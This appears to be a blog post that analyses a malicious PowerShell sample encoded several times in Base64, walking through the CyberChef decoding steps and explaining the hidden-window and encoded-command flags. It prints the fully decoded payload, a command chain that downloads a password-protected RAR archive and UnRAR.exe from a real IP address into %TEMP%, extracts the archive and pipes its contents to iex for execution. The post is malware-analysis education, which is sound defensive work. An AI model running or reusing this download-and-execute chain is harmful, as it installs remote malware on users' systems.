Analysis Double Encoded Malicious Powershell

By

 



In this article, we will try to analyze a PowerShell file that has been encoded several times. This type of mechanism is sometimes used to bypass detection tools and sometimes make analysis more difficult, especially by analysts at the beginning level of malware analysis.

Sample SHA-256 : 59c4ed935aeac36675c202a0f5b56d0f895d2417ea201d53d2f25f291f13f76c


Code Analysis :

1- powershell -w H -eC : Malware Developer in this first line of the malicious code that indicate : Powershell -w that is mean : Windows Style , -H that is mean Hidden . In Addition -eC that is mean Encode Command . So, -w H tells PowerShell to run the script without showing any window (completely hidden from the user).



Code Decryption Process :

1- Open CyberChef
2- Paste the encoded code in left-side .
3- Select From Base64 in Operations .


4- Then again in Operation select remove null bytes . 


In the Image it show again we have another encoded base64 codes , that appear the same code that we have from the original file . but it's completely different . let's copy the encoded codes and then apply the same operations . 

1- Open CyberChef
2- Paste the encoded code in left-side .
3- Select From Base64 in Operations .
4- Then again in Operation select remove null bytes . 

But let's see another encoded code appear in the image below but it's different powershell code . the powershell -w H -eC. is same . but the encoded code is different . 

Decoding Process :

1- Open CyberChef
2- Paste the encoded code in left-side .
3- Select From Base64 in Operations .



Fully Decoded Malicious Powershell Code :

Invoke-WebRequest -Uri "http://[95.]164.55.39/main/glh/[yhgdv8.rar]" -OutFile 
"$env:TEMP\yhgdv8.rar"; iwr -Uri "http://95.164.55.39/[UnRAR.exe]" -OutFile
"$env:TEMP\[UnRAR.exe]"; Start-Process -NoNewWindow -FilePath "$env:TEMP\UnRAR.exe" -ArgumentList "x", "-pvPNTfmDk9jjofeD", "-o+", "$env:TEMP\yhgdv8.rar", "$env:TEMP"; Start-Sleep -Seconds 4; Get-Content "$env:TEMP\yhgdv8.txt" | iex;

Decoded Malicious Powershell code analysis :

1- Malware Developer download the rar file : Invoke-WebRequest -Uri "http://[95.]164.55.39/main/glh/[yhgdv8.rar]" -OutFile 

2- Malware Developer Drop a file into %TEMP% and download UnRar.exe file : $env:TEMP\yhgdv8.rar"; iwr -Uri "http://95.164.55.39/[UnRAR.exe]" -OutFile

3- Malware Developer Extract the rar file that includes another executable file from %TEMP% folder : "$env:TEMP\[UnRAR.exe]"; Start-Process -NoNewWindow -FilePath "$env:TEMP\UnRAR.exe" -ArgumentList "x", "-pvPNTfmDk9jjofeD", "-o+", "$env:TEMP\yhgdv8.rar", "$env:TEMP";

4- Malware Developer Start Execution extracted file from yhgdb8.rar : Start-Sleep -Seconds 4; Get-Content "$env:TEMP\yhgdv8.txt" | iex; .




Comments

Post a Comment